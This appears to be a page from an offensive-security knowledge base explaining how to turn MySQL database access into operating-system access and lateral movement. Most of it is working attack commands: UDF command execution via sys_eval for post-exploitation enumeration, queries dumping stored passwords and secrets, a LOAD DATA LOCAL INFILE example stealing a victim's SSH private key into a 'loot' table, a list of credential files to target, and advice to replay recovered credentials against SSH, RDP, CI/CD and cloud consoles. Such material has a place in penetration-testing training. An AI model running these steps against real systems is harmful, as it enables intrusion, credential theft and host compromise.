Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter II - Local / 05. SQL / MySQL

Lateral Movement and Privilege Escalation

MySQL is often a bridge between application access and operating system access.

The service itself is not automatically a root shell. We prove the primitive, identify the OS account, then decide whether privilege escalation or lateral movement is available.


From Database Access To OS Access

Primary chains:

FILE + webroot write -> webshell -> web server user
FILE + plugin_dir write -> UDF -> MySQL service account
LOCAL INFILE -> client-side file theft -> credential reuse
database dump -> credentials -> SSH/RDP/app/admin panels

UDF Privilege Escalation Reality

UDF command execution runs as the MySQL service account.

Check context immediately:

SELECT sys_eval('id');
SELECT sys_eval('whoami');
SELECT sys_eval('hostname');

Impact depends on that OS account:

Service ContextLikely Impact
mysql userLocal foothold, data access, possible privesc through writable scripts, backups, cron, sudo, weak file permissions.
rootDirect host compromise. Rare and severe.
Windows service accountHost/domain impact depends on local privileges and domain rights.
XAMPP/local dev serviceOften higher file-system write access and webshell paths.

Local Privilege Escalation From MySQL Context

After UDF RCE, enumerate like any local shell:

SELECT sys_eval('id');
SELECT sys_eval('sudo -l');
SELECT sys_eval('find / -perm -4000 -type f 2>/dev/null');
SELECT sys_eval('find / -writable -type d 2>/dev/null | head');
SELECT sys_eval('cat /etc/passwd');

Look for:

  • writable webroots
  • writable backup scripts
  • writable cron paths
  • database backups containing credentials
  • application config files
  • SSH keys readable by the service account
  • password reuse between MySQL and OS accounts

Credential Reuse

Dump application credentials:

SELECT * FROM users LIMIT 10;
SELECT username, password FROM users;

Search config-like tables:

SELECT table_schema, table_name, column_name
FROM information_schema.columns
WHERE column_name LIKE '%pass%'
   OR column_name LIKE '%token%'
   OR column_name LIKE '%secret%'
   OR column_name LIKE '%key%';

Try recovered credentials against:

SSH
RDP
admin panels
other databases
CI/CD
cloud consoles
backup systems

LOCAL INFILE As Lateral Movement

LOCAL INFILE can steal files from the connecting client.

High-value client-side targets:

/var/www/html/config.php
/home/user/.ssh/id_rsa
/home/user/.aws/credentials
/home/user/.kube/config
C:\Users\user\.aws\credentials
C:\Users\user\.ssh\id_rsa

Example:

CREATE TABLE loot(line TEXT);
LOAD DATA LOCAL INFILE '/home/victim/.ssh/id_rsa'
INTO TABLE loot
FIELDS TERMINATED BY '\n';

This is lateral movement because the database interaction reaches into the client's filesystem rather than the server's filesystem.


Webshell To Host Pivot

If OUTFILE lands a webshell:

database user -> webroot file write -> web server code execution -> OS user

Immediate checks from the webshell:

id
whoami
hostname
pwd
ls -la
cat application config files

The next pivot is usually credential theft from application config, SSH keys, deployment files, or database backups.